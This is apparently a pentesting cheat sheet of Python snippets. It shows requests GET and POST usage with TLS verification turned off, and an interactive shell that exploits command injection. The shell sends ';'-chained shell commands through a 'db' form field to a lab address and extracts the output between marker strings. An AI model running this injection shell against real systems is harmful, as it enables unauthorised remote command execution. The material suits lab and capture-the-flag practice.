description
GET request, POST request (regular, JSON, file)
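import requests

# Request building blocks; every value below is a constructed example.
url = "http://example.com:80/some/path.php"
params = {"p1": "value1", "p2": "value2"}
headers = {"User-Agent": "fake User Agent", "Fake header": "True value"}
cookies = {"PHPSESSID": "1234567890abcdef", "FakeCookie123": "456"}
# Intercepting proxy on loopback (e.g. Burp); both schemes are routed through it.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# Regular GET request sending parameters (params).
# verify=False turns off TLS certificate validation: the connection is then
# exposed to anyone on the path, and urllib3 raises InsecureRequestWarning on
# every call. Keep the default (True) whenever the target's certificate is valid.
gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True)
code = gr.status_code                        # int, e.g. 200
ret_headers = gr.headers                     # case-insensitive response headers
body_byte = gr.content                       # raw response bytes
body_text = gr.text                          # body decoded with the guessed encoding
ret_cookies = gr.cookies                     # cookies set by the response
is_redirect = gr.is_redirect
is_permanent_redirect = gr.is_permanent_redirect
float_seconds = gr.elapsed.total_seconds()   # float seconds, e.g. 10.231

# Regular POST request sending parameters (data) -> form-encoded body.
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
# JSON POST request sending parameters (json) -> application/json body.
pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

# POST request sending a file (files) and extra form values.
# Read the bytes inside `with` so the file handle is closed afterwards
# (the inline open(...).read() form never closed it).
with open("filename.png", 'rb') as fh:
    file_bytes = fh.read()
filedict = {"<FILE_PARAMETER_NAME>": ("filename.png", file_bytes, "image/png")}
pr = requests.post(url, data={"submit": "submit"}, files=filedict)

# Useful for presenting results in boolean/time-based injections: "\r" with
# end="" redraws the same terminal line as each character is confirmed.
flag = ""   # placeholder: the value recovered so far, filled by the caller's loop
char = ""   # placeholder: the candidate character currently under test
print(f"\r flag: { flag } { char } ", end="")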
Python `cmd` shell to exploit an RCE
import requests
import re
from cmd import Cmd
class Terminal(Cmd):
    """Interactive prompt; every line that is not a built-in Cmd command goes to RunCmd."""

    prompt = "Inject => "

    def default(self, args):
        # Cmd dispatches here for any input without a matching do_* handler;
        # whatever RunCmd returns (str or int) is printed as-is.
        print(RunCmd(args))
def RunCmd(cmd):
    """Send one command to the target's 'db' field and return the captured output.

    The command is placed between two literal marker strings so the response
    can be trimmed to just the command output with a regex.

    Args:
        cmd: the line typed at the Terminal prompt.

    Returns:
        The text between the markers (str) when found, otherwise the int 1 —
        note the mixed return type; the caller prints either value verbatim.
    """
    data = {'db': f'lol; echo -n "MYREGEXP"; { cmd } ; echo -n "MYREGEXP2"'}
    # Fixed lab address over plain HTTP; no timeout and no error handling, so a
    # hung or refused connection blocks the prompt.
    # NOTE(review): the constant markers and ';'-chained shell in a form field are
    # an easy log/WAF signature for this probe on the defending side.
    r = requests.post('http://10.10.10.127/select', data=data)
    page = r.text
    # DOTALL lets the lazy capture span newlines in multi-line output.
    m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
    if m:
        return m.group(1)
    else:
        return 1
# Script entry: start the prompt immediately on import/run; EOF (Ctrl-D) or an
# unhandled exception from RunCmd ends the loop.
term = Terminal()
term.cmdloop()